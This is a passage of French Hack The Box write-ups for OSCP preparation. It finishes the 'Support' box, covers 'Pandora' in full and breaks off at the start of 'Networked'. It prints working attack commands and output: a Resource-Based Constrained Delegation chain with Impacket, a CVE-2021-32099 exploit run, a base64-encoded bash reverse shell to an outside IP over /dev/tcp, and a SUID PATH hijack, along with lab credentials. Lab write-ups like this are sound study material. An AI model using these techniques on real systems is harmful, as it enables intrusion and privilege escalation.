/root/.nxc/modules/nxc_spider_plus SMB 10.10.11.174 445 DC [*] Enumerated shares SMB 10.10.11.174 445 DC Share Permissions Remark SMB 10.10.11.174 445 DC ----- ----------- ------ SMB 10.10.11.174 445 DC ADMIN$ Remote Admin SMB 10.10.11.174 445 DC C$ Default share SMB 10.10.11.174 445 DC IPC$ READ Remote IPC SMB 10.10.11.174 445 DC NETLOGON Logon server share SMB 10.10.11.174 445 DC support-tools READ support staff tools SMB 10.10.11.174 445 DC SYSVOL Logon server share SPIDER_PLUS 10.10.11.174 445 DC [+] Saved share-file metadata to \u0026#34;/root/.nxc/modules/nxc_spider_plus/10.10.11.174.json\u0026#34;. SPIDER_PLUS 10.10.11.174 445 DC [*] SMB Shares: 6 (ADMIN$, C$, IPC$, NETLOGON, support-tools, SYSVOL) SPIDER_PLUS 10.10.11.174 445 DC [*] SMB Readable Shares: 2 (IPC$, support-tools) SPIDER_PLUS 10.10.11.174 445 DC [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.10.11.174 445 DC [*] Total folders found: 0 SPIDER_PLUS 10.10.11.174 445 DC [*] Total files found: 7 SPIDER_PLUS 10.10.11.174 445 DC [*] File size average: 13.96 MB SPIDER_PLUS 10.10.11.174 445 DC [*] File size min: 77.32 KB SPIDER_PLUS 10.10.11.174 445 DC [*] File size max: 45.87 MB $ cat /root/.nxc/modules/nxc_spider_plus/10.10.11.174.json { \u0026#34;support-tools\u0026#34;: { \u0026#34;7-ZipPortable_21.07.paf.exe\u0026#34;: { \u0026#34;atime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:19\u0026#34;, \u0026#34;ctime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:19\u0026#34;, \u0026#34;mtime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:19\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;2.75 MB\u0026#34; }, \u0026#34;UserInfo.exe.zip\u0026#34;: { \u0026#34;atime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:31\u0026#34;, \u0026#34;ctime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:31\u0026#34;, \u0026#34;mtime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:31\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;45.87 MB\u0026#34; }, \u0026#34;UserInfo.exe.zip\u0026#34;: { \u0026#34;atime_epoch\u0026#34;: \u0026#34;2022-07-20 19:01:07\u0026#34;, \u0026#34;ctime_epoch\u0026#34;: \u0026#34;2022-07-20 19:01:06\u0026#34;, \u0026#34;mtime_epoch\u0026#34;: \u0026#34;2022-07-20 19:01:07\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;271 KB\u0026#34; }, \u0026#34;WiresharkPortable64_3.6.5.paf.exe\u0026#34;: { \u0026#34;atime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:43\u0026#34;, \u0026#34;ctime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:43\u0026#34;, \u0026#34;mtime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:43\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;42.34 MB\u0026#34; }, \u0026#34;npp.8.4.1.portable.x64.zip\u0026#34;: { \u0026#34;atime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:55\u0026#34;, \u0026#34;ctime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:55\u0026#34;, \u0026#34;mtime_epoch\u0026#34;: \u0026#34;2022-05-28 13:19:55\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;5.19 MB\u0026#34; }, \u0026#34;putty.exe\u0026#34;: { \u0026#34;atime_epoch\u0026#34;: \u0026#34;2022-05-28 13:20:06\u0026#34;, \u0026#34;ctime_epoch\u0026#34;: \u0026#34;2022-05-28 13:20:06\u0026#34;, \u0026#34;mtime_epoch\u0026#34;: \u0026#34;2022-05-28 13:20:06\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;1.21 MB\u0026#34; }, \u0026#34;windirstat1_1_2_setup.exe\u0026#34;: { \u0026#34;atime_epoch\u0026#34;: \u0026#34;2022-05-28 13:20:17\u0026#34;, \u0026#34;ctime_epoch\u0026#34;: \u0026#34;2022-05-28 13:20:17\u0026#34;, \u0026#34;mtime_epoch\u0026#34;: \u0026#34;2022-05-28 13:20:17\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;77.32 KB\u0026#34; } } } UserInfo.exe.zip : .NET executable 1 2 3 4 5 $ nxc smb 10.10.11.174 -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --get-file \\\\UserInfo.exe.zip UserInfo.exe.zip --share support-tools SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False) SMB 10.10.11.174 445 DC [+] support.htb\\guest: SMB 10.10.11.174 445 DC [*] Copying \u0026#34;\\UserInfo.exe.zip\u0026#34; to \u0026#34;UserInfo.exe.zip\u0026#34; SMB 10.10.11.174 445 DC [+] File \u0026#34;\\UserInfo.exe.zip\u0026#34; was downloaded to \u0026#34;UserInfo.exe.zip\u0026#34; Ce zip contient un binaire cutom UserInfo.exe. En décompilant le binaire, on découvre une string ressemblant à un mot de passe chiffré ainsi qu\u0026rsquo;une clé :\n\u0026ldquo;0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\u0026rdquo; \u0026ldquo;armando\u0026rdquo; Une fonction getPassword semble déchiffrer cette string à l\u0026rsquo;aide de la clé en effectuant une manipulation.\nGrâce à ChatGPT, j\u0026rsquo;ai pu comprendre comment fonctionnait le code et il m\u0026rsquo;a généré un code Python équivalent au code .NET ce qui m\u0026rsquo;a permis de récupérer le mot de passe :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import base64 enc_password = \u0026#34;0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\u0026#34; key = b\u0026#34;armando\u0026#34; # Base64 decode enc_bytes = base64.b64decode(enc_password) dec_bytes = bytearray() for i, b in enumerate(enc_bytes): k = key[i % len(key)] dec_bytes.append(b ^ k ^ 0xDF) password = dec_bytes.decode(\u0026#34;utf-8\u0026#34;, errors=\u0026#34;ignore\u0026#34;) print(password) En executant le python, on trouve le mot de passe :\nldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz C\u0026rsquo;est très intéressant car une autre méthode attendue était d\u0026rsquo;executer le programme et d\u0026rsquo;effectuer des requête ldap authentifiées avec le compte utilisateur \u0026ldquo;ldap\u0026rdquo;. Il suffisait de lancer wireshark et d\u0026rsquo;analyser le trafic réseau afin de récupérer le mot de passe !\nBien sûr, le jour de l\u0026rsquo;OSCP il n\u0026rsquo;y aura pas de chatBot autorisé donc il faut prioriser la seconde méthode, à moins que vous ayez un très bon décompilateur de code .NET.\nRusthound / Bloodhound : \u0026ldquo;support\u0026rdquo; account On execute rusthound afin d\u0026rsquo;extraire les informations du compte ldap, puis on fait une analyse sur bloodhound. On trouve le compte support qui semble être très intéressant car il existe une route permettant à cet utilisateur de prendre la main sur le DC :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 $ rusthound -d support.htb -u \u0026#34;ldap\u0026#34;@\u0026#34;support.htb\u0026#34; -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; -o /workspace/Support/bloodhound_data --zip -n 10.10.11.174 --------------------------------------------------- Initializing RustHound at 23:06:53 on 09/09/25 Powered by g0h4n from OpenCyber --------------------------------------------------- [2025-09-09T21:06:53Z INFO rusthound] Verbosity level: Info [2025-09-09T21:06:53Z INFO rusthound::ldap] Connected to SUPPORT.HTB Active Directory! [2025-09-09T21:06:53Z INFO rusthound::ldap] Starting data collection... [2025-09-09T21:06:54Z INFO rusthound::ldap] All data collected for NamingContext DC=support,DC=htb [2025-09-09T21:06:54Z INFO rusthound::json::parser] Starting the LDAP objects parsing... [2025-09-09T21:06:54Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10 [2025-09-09T21:06:54Z INFO rusthound::json::parser] Parsing LDAP objects finished! [2025-09-09T21:06:54Z INFO rusthound::json::checker] Starting checker to replace some values... [2025-09-09T21:06:54Z INFO rusthound::json::checker] Checking and replacing some values finished! [2025-09-09T21:06:54Z INFO rusthound::json::maker] 21 users parsed! [2025-09-09T21:06:54Z INFO rusthound::json::maker] 61 groups parsed! [2025-09-09T21:06:54Z INFO rusthound::json::maker] 2 computers parsed! [2025-09-09T21:06:54Z INFO rusthound::json::maker] 1 ous parsed! [2025-09-09T21:06:54Z INFO rusthound::json::maker] 1 domains parsed! [2025-09-09T21:06:54Z INFO rusthound::json::maker] 2 gpos parsed! [2025-09-09T21:06:54Z INFO rusthound::json::maker] 21 containers parsed! [2025-09-09T21:06:54Z INFO rusthound::json::maker] /workspace/Support/bloodhound_data/20250909230654_support-htb_rusthound.zip created! RustHound Enumeration Completed at 23:06:54 on 09/09/25! Happy Graphing! On remarque que le compte support fait parti du groupe SHARED SUPPORT ACCOUNTS, qui a le droit GENERIC ALL sur le DC.\nCependant, on ne trouve a aucun moyen de récupérer le compte support.\nldapsearch : support\u0026rsquo;s password En analysant les données de l\u0026rsquo;Active Directory directement avec ldapsearch, on observe un champs \u0026ldquo;info\u0026rdquo; qu\u0026rsquo;on ne pouvait pas voir sur bloodhound. Il contient\u0026hellip; le mot de passe de l\u0026rsquo;utilisateur support :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ ldapsearch -x -H ldap://10.10.11.174 -D \u0026#34;support\\ldap\u0026#34; -w \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; -b \u0026#34;DC=support,DC=htb\u0026#34; | grep -i \u0026#34;sAMAccountName.*support\u0026#34; -A10 -B25 distinguishedName: CN=support,CN=Users,DC=support,DC=htb instanceType: 4 whenCreated: 20220528111200.0Z whenChanged: 20220528111201.0Z uSNCreated: 12617 info: Ironside47pleasure40Watchful # \u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;-------- HERE memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb uSNChanged: 12630 ... lastLogon: 0 pwdLastSet: 132982099209777070 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: support ... Privilege Escalation Generic All on DC : Resource-Based Constrained Delegation Attack Nous avons observé auparavant que support appartient à un groupe ayant le droite \u0026ldquo;GENERIC ALL\u0026rdquo; sur le DC.\nIl faut alors exploiter une Resource-Based Constrained Delegation Attack.\nEn utilisant les conseils donnés par bloodhound, voici un exemple d\u0026rsquo;exploitation :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 # First, if an attacker does not control an account with an SPN set, a new attacker-controlled computer account can be added with Impacket\u0026#39;s addcomputer.py example script: $ addcomputer.py -computer-name \u0026#39;HACKED$\u0026#39; -computer-pass \u0026#39;hacked123!\u0026#39; -dc-host DC.SUPPORT.HTB -domain-netbios support.htb support.htb/\u0026#39;support\u0026#39;:\u0026#39;Ironside47pleasure40Watchful\u0026#39; [*] Successfully added machine account HACKED$ with password hacked123!. # We now need to configure the target object so that the attacker-controlled computer can delegate to it. Impacket\u0026#39;s rbcd.py script can be used for that purpose: $ rbcd.py -delegate-from \u0026#34;HACKED$\u0026#34; -delegate-to \u0026#39;DC$\u0026#39; -dc-ip \u0026#34;10.10.11.174\u0026#34; -action write \u0026#34;support.htb\u0026#34;/\u0026#34;support\u0026#34;:\u0026#39;Ironside47pleasure40Watchful\u0026#39; [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] HACKED$ can now impersonate users on DC$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] HACKED$ (S-1-5-21-1677581083-3380853377-188903654-5601) # And finally we can get a service ticket for the service name (sname) we want to \u0026#34;pretend\u0026#34; to be \u0026#34;admin\u0026#34; for. Impacket\u0026#39;s getST.py example script can be used for that purpose. $ getST.py -spn CIFS/dc.support.htb -impersonate Administrator -dc-ip \u0026#34;10.10.11.174\u0026#34; \u0026#34;support.htb\u0026#34;/\u0026#39;HACKED$\u0026#39;:\u0026#39;hacked123!\u0026#39; [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@CIFS_dc.support.htb@SUPPORT.HTB.ccache $ mv Administrator@CIFS_dc.support.htb@SUPPORT.HTB.ccache admin.ccache $ export KRB5CCNAME=\u0026#34;admin.ccache\u0026#34; # This ticket can then be used with Pass-the-Ticket, and could grant access to the file system of the TARGETCOMPUTER. $ psexec.py -k -no-pass support.htb/Administrator@dc.support.htb [*] Requesting shares on dc.support.htb..... [*] Found writable share ADMIN$ [*] Uploading file phZHHPqE.exe [*] Opening SVCManager on dc.support.htb..... [*] Creating service YbSC on dc.support.htb..... [*] Starting service YbSC..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.20348.859] (c) Microsoft Corporation. All rights reserved. C:\\Windows\\system32\u0026gt; type C:\\Users\\support\\Desktop\\user.txt 1e30.....0c23 C:\\Windows\\system32\u0026gt; type C:\\Users\\Administrator\\Desktop\\root.txt a848.....12cf Tips Je n\u0026rsquo;ai pas trouvé le mot de passe de l\u0026rsquo;utilisateur support avec ldapsearch.\nConseil: Après de longues recherches sur bloodhound, si on trouve un compte et/ou un groupe intéressant, toujours les analyser avec ldapsearch après, pour vérifier qu\u0026rsquo;il n\u0026rsquo;y pas d\u0026rsquo;infos supplémentaires tel qu\u0026rsquo;un mot de passe dans une variable de description par exemple.\n","date":"2025-09-07T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/support-htb/","title":"HTB | Support"},{"content":" Machine name OS IP Difficulty Pandora Linux 10.10.11.136 Easy Users 1 daniel : HotelBabylon23 Enumeration nmap TCP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.136 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24c295a5c30b3ff3173c68d7af2b5338 (RSA) | ssh-rsa AAAAB3...........Dd8TnI/DFFs= | 256 b1417799469a6c5dd2982fc0329ace03 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLX..........Dea3F/CxfOQeqLpanqso/EqXcT9w= | 256 e736433ba9478a190158b2bc89f65108 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C |_http-title: Play | Landing |_http-server-header: Apache/2.4.41 (Ubuntu) Website (port 80) Rien d\u0026rsquo;intéressant ! Le site est basé sur une template bootstrap, mais rien a signalé. Pas de fichiers suspects, pas de CVE, pas de XSS ou d\u0026rsquo;injection SQL.\nnmap UDP Après un scan du top 1000 des ports UDP, on remarque le port 161 avec un serveur SNMP :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 $ nmap -sU -sV --top-ports 1000 -T4 -vvv 10.10.11.136 PORT STATE SERVICE REASON VERSION 23/udp open|filtered telnet no-response 161/udp open snmp udp-response ttl 63 SNMPv1 server; net-snmp SNMPv3 server (public) 177/udp open|filtered xdmcp no-response 520/udp open|filtered route no-response 539/udp open|filtered apertus-ldp no-response 688/udp open|filtered realm-rusd no-response 782/udp open|filtered hp-managed-node no-response 983/udp open|filtered unknown no-response 1026/udp open|filtered win-rpc no-response 1038/udp open|filtered mtqp no-response 1419/udp open|filtered timbuktu-srv3 no-response 1719/udp open|filtered h323gatestat no-response 2161/udp open|filtered apc-2161 no-response 2967/udp open|filtered symantec-av no-response 4008/udp open|filtered netcheque no-response 5001/udp open|filtered commplex-link no-response 6004/udp open|filtered X11:4 no-response 16739/udp open|filtered unknown no-response 17585/udp open|filtered unknown no-response 17823/udp open|filtered unknown no-response 18485/udp open|filtered unknown no-response 18987/udp open|filtered unknown no-response 19140/udp open|filtered unknown no-response 19315/udp open|filtered keyshadow no-response 19632/udp open|filtered unknown no-response 19682/udp open|filtered unknown no-response 20003/udp open|filtered commtact-https no-response 20004/udp open|filtered unknown no-response 20791/udp open|filtered unknown no-response 21320/udp open|filtered unknown no-response 21524/udp open|filtered unknown no-response 21923/udp open|filtered unknown no-response 22053/udp open|filtered unknown no-response 27899/udp open|filtered unknown no-response 31625/udp open|filtered unknown no-response 32772/udp open|filtered sometimes-rpc8 no-response 33354/udp open|filtered unknown no-response 37393/udp open|filtered unknown no-response 40708/udp open|filtered unknown no-response 44508/udp open|filtered unknown no-response 49152/udp open|filtered unknown no-response 49222/udp open|filtered unknown no-response Service Info: Host: pandora Foothold snmpwalk : daniel On utilise le logiciel snmpwalk pour afficher diverses informations :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ snmpwalk -v2c -c public 10.10.11.136 iso.3.6.1.2.1.1.1.0 = STRING: \u0026#34;Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64\u0026#34; iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 iso.3.6.1.2.1.1.3.0 = Timeticks: (243441) 0:40:34.41 iso.3.6.1.2.1.1.4.0 = STRING: \u0026#34;Daniel\u0026#34; iso.3.6.1.2.1.1.5.0 = STRING: \u0026#34;pandora\u0026#34; iso.3.6.1.2.1.1.6.0 = STRING: \u0026#34;Mississippi\u0026#34; iso.3.6.1.2.1.1.7.0 = INTEGER: 72 iso.3.6.1.2.1.1.8.0 = Timeticks: (34) 0:00:00.34 iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1 ... $ snmpwalk -v2c -c public 10.10.11.136 \u0026gt; snmpwalk.out $ grep -rni string snmpwalk.out ... 1867:iso.3.6.1.2.1.25.4.2.1.5.962 = STRING: \u0026#34;--no-debug\u0026#34; 1868:iso.3.6.1.2.1.25.4.2.1.5.977 = STRING: \u0026#34;-k start\u0026#34; 1869:iso.3.6.1.2.1.25.4.2.1.5.1085 = STRING: \u0026#34;-u daniel -p HotelBabylon23\u0026#34; \u0026lt;---------- 1870:iso.3.6.1.2.1.25.4.2.1.5.1225 = STRING: \u0026#34;-k start\u0026#34; ... On trouve les credentials de l\u0026rsquo;utilisateur Daniel. En essayant de se connecter en SSH, ça fonctionne :\n1 2 3 4 5 6 7 8 9 $ ssh daniel@10.10.11.136 daniel@10.10.11.136\u0026#39;s password: Last login: Fri Sep 5 12:29:55 2025 from 10.10.14.8 -bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) daniel@pandora:~$ whoami daniel daniel@pandora:~$ ls /home/ daniel matt On découvre alors l\u0026rsquo;utilisateur matt.\ndaniel -\u0026gt; matt Pandora CMS v7.0NG.742 On trouve un dossier \u0026ldquo;pandora_console\u0026rdquo; dans /var/www. On se rend compte dans /etc/host qu\u0026rsquo;il semble y a avoir un deuxieme site web sur 127.0.0.1:80. J\u0026rsquo;ai décidé de faire du port forwarding pour accéder au site web depuis mon navigateur sur le port 8888 de ma machine :\n1 ssh daniel@10.10.11.136 -L 8888:127.0.0.1:80 On trouve alors une page de login Pandora CMS v7.0NG.742.\nCVE-2021-32099 Après quelque recherches, on trouve plusieurs CVE dont une injection SQL : CVE-2021-32099.\nElle nous permet de se connecter en tant qu\u0026rsquo;admin et de téléverser un fichier php nous permettant d\u0026rsquo;executer du code sur la machine en tant que l\u0026rsquo;utilisateur matt.\nExploit : https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/tree/master\nJ\u0026rsquo;ai pu utiliser un exploit déjà écrit, qui execute l\u0026rsquo;injection SQL et upload directement un fichier php pour nous. Il nous donne un shell non-interactif.\nJ\u0026rsquo;ai executé un reverse shell, que j\u0026rsquo;ai converti en base64 puis j\u0026rsquo;ai URL encoded le tout car je sais que le script python fait une requete GET sur le fichier php et passe mes commandes dans l\u0026rsquo;URL.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 python3 sqlpwn.py -t 127.0.0.1:8888 URL: http://127.0.0.1:8888/pandora_console [+] Sending Injection Payload [+] Requesting Session [+] Admin Session Cookie : lkgcnm6itdo17dmogbhc6733j1 [+] Sending Payload [+] Respose : 200 [+] Pwned :) [+] If you want manual Control : http://127.0.0.1:8888/pandora_console/images/pwn.php?test= CMD \u0026gt; bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.8/1337 0\u0026gt;\u0026amp;1 CMD \u0026gt; echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC44LzEzMzcgMD4mMQ%3D%3D%20%7C%20base64%20-d%20%7C%20bash -------------------------------------- $ nc -lnvp 1337 matt@pandora:/var/www/pandora/pandora_console/images$ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; \u0026lt;ges$ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; matt@pandora:/var/www/pandora/pandora_console/images$ export TERM=xterm export TERM=xterm matt@pandora:/var/www/pandora/pandora_console/images$ ^Z [1] + 27546 suspended nc -lnvp 1337 $ stty raw -echo;fg [1] + 27546 continued nc -lnvp 1337 matt@pandora:/var/www/pandora/pandora_console/images$ whoami matt matt@pandora:/var/www/pandora/pandora_console/images$ cd /home/matt matt@pandora:/home/matt$ cat user.txt 2251.....82e1 Pandora Database Creds J\u0026rsquo;ai trouvé le mot de passe de la base de donnée mysql mais impossible de cracker les hachages. Sauf celui de daniel, qui correspond bien au même mot de passe qu\u0026rsquo;en SSH.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 matt@pandora:~$ cat /var/www/pandora/pandora_console/include/config.php \u0026lt;?php // File generated by centos kickstart $config[\u0026#34;dbtype\u0026#34;] = \u0026#34;mysql\u0026#34;;\t$config[\u0026#34;dbname\u0026#34;]=\u0026#34;pandora\u0026#34;;\t$config[\u0026#34;dbuser\u0026#34;]=\u0026#34;pandora\u0026#34;;\t$config[\u0026#34;dbpass\u0026#34;]=\u0026#34;PandoraFMSSecurePass2021\u0026#34;; $config[\u0026#34;dbhost\u0026#34;]=\u0026#34;localhost\u0026#34;;\t$config[\u0026#34;homedir\u0026#34;]=\u0026#34;/var/www/pandora/pandora_console\u0026#34;; $config[\u0026#34;homeurl\u0026#34;]=\u0026#34;/pandora_console\u0026#34;;\terror_reporting(0); $ownDir = dirname(__FILE__) . \u0026#39;/\u0026#39;; include ($ownDir . \u0026#34;config_process.php\u0026#34;); ?\u0026gt; ------------------- MariaDB [pandora]\u0026gt; select email,password from tusuario; +--------------------+----------------------------------+ | email | password | +--------------------+----------------------------------+ | admin@pandora.htb | ad3f741b04bd5880fb32b54bc4f43d6a | | daniel@pandora.htb | 76323c174bd49ffbbdedf678f6cc89a6 | | matt@pandora.htb | f655f807365b6dc602b31ab3d6d43acc | +--------------------+----------------------------------+ 3 rows in set (0.000 sec) matt -\u0026gt; root SSH session Dans un premier temps, j\u0026rsquo;ai essayé d\u0026rsquo;executer \u0026ldquo;sudo -l\u0026rdquo;, mais une erreur bizarre s\u0026rsquo;affiche :\n1 2 3 matt@pandora:/home/matt/.ssh$ sudo -l sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted sudo: unable to initialize policy plugin J\u0026rsquo;ai donc décidé de générer une paire de clés et de me connecter à matt en utilisant SSH pour plus de stabilité. Cela va avoir son importance pour l\u0026rsquo;exploitation :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 $ ssh-keygen -t rsa -b 4096 -f matt Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in matt Your public key has been saved in matt.pub The key fingerprint is: SHA256:BH80icivzuGhGoIvDyqROBTJ3Yos2GjweEF7u2FwJrI root@exegol-pentest The key\u0026#39;s randomart image is: +---[RSA 4096]----+ |..+ .... .o. | |.+.o .oo.... | |==*.= .o . | |=B+B . ... | |Eo + .S | |* . o+ | |+o. .= o | |++ .. + | |oo+. | +----[SHA256]-----+ $ ssh matt@10.10.11.136 -i matt Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. -bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) matt@pandora:~$ sudo -l [sudo] password for matt: # On observe bien qu\u0026#39;il n\u0026#39;y a plus d\u0026#39;erreur ici matt@pandora:~$ /usr/bin/pandora_backup En utilisant linpeas, on découvre un binaire SUID suspect /usr/bin/pandora_backup. Après analyse du binaire, il semble execute la commande tar en tant que root.\nIl n\u0026rsquo;utilise pas un path absolu, comme par exemple \u0026ldquo;/bin/tar\u0026rdquo;, ce qui va nous permettre de faire une attaque de type PATH injection :\nVoici le code décompilé :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 int __cdecl main(int argc, const char **argv, const char **envp) { __uid_t v3; // ebx __uid_t v4; // eax v3 = getuid(); v4 = geteuid(); setreuid(v4, v3); puts(\u0026#34;PandoraFMS Backup Utility\u0026#34;); puts(\u0026#34;Now attempting to backup PandoraFMS client\u0026#34;); if ( system(\u0026#34;tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*\u0026#34;) ) { puts(\u0026#34;Backup failed!\\nCheck your permissions!\u0026#34;); return 1; } else { puts(\u0026#34;Backup successful!\u0026#34;); puts(\u0026#34;Terminating program!\u0026#34;); return 0; } } Le problème majeur de cette box, est que si on se connecte pas en SSH, le binaire SUID ne s\u0026rsquo;execute pas en tant que root et il y a une erreur Permission Denied :\n1 2 3 4 5 6 7 matt@pandora:/home/matt/.ssh$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied tar: Error is not recoverable: exiting now Backup failed! Check your permissions! En utilisant SSH, le problème disparait et la commande tar s\u0026rsquo;execute bien en tant que root.\nLe binaire SUID est désormais exploitable :\n1 2 3 4 5 matt@pandora:~$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client Backup successful! Terminating program! Voici un exemple d\u0026rsquo;exploitation simple. On crée un fichier \u0026ldquo;tar\u0026rdquo; contenant la commande /bin/bash, on lui donne les droits en execution et on place le dossier où il se trouve (home directory de matt) au debut dans la variable $PATH. Lorsqu\u0026rsquo;on execute which on observe bien que notre tar à remplacer la véritable commande. Il ne reste plus qu\u0026rsquo;a executer notre binaire SUID pandora_backup pour obtenir un shell en tant que root :\n1 2 3 4 5 6 7 8 9 10 11 12 matt@pandora:~$ echo \u0026#34;/bin/bash\u0026#34; \u0026gt; tar matt@pandora:~$ chmod +x tar matt@pandora:~$ export PATH=/home/matt:$PATH matt@pandora:~# which tar /home/matt/tar matt@pandora:~$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client root@pandora:~# whoami root root@pandora:~# cat /root/root.txt fd9c.....291d Tips Toujours lancer un scan des ports UDP : D\u0026rsquo;abord un petit scan, puis un gros si on ne trouve rien d\u0026rsquo;autre. Si le port SSH est ouvert : toujours essayer de générer une paire clés SSH, placé le .pub dans authorized_keys et effectuer une connexion. Sur cette boxe, il était un impossible de faire sudo -l. Un bug empêchant d\u0026rsquo;exploiter le binaire pandora_backup SUID. A travers la session SSH, le bug n\u0026rsquo;était plus présent. Donc dans le doute : toujours tenter une connexion SSH. Pour savoir s\u0026rsquo;il est possble de se connecter en ssh, en utilisant une paire de clés il faut vérifier le fichier de configuration ssh coté serveur : /etc/ssh/sshd_config Si :\n#PubkeyAuthentication yes \u0026ndash;\u0026gt; Commenté, valeur par défaut \u0026ldquo;yes\u0026rdquo;, donc c\u0026rsquo;est possible #AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2 \u0026ndash;\u0026gt; commenté, par défaut \u0026ldquo;.ssh/authorized_keys\u0026rdquo; donc c\u0026rsquo;est Okay AllowUsers daniel matt \u0026ndash;\u0026gt; Seulement ces utilisateurs peuvent se connecter en ssh UsePAM yes \u0026ndash;\u0026gt; le mot de passe classique fonctionne via PAM mais ça ne bloque pas les clés pour autant ","date":"2025-09-05T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/pandora-htb/","title":"HTB | Pandora"},{"content":" Machine name OS IP Difficulty Networked Linux 10.10.10.146 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.146 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 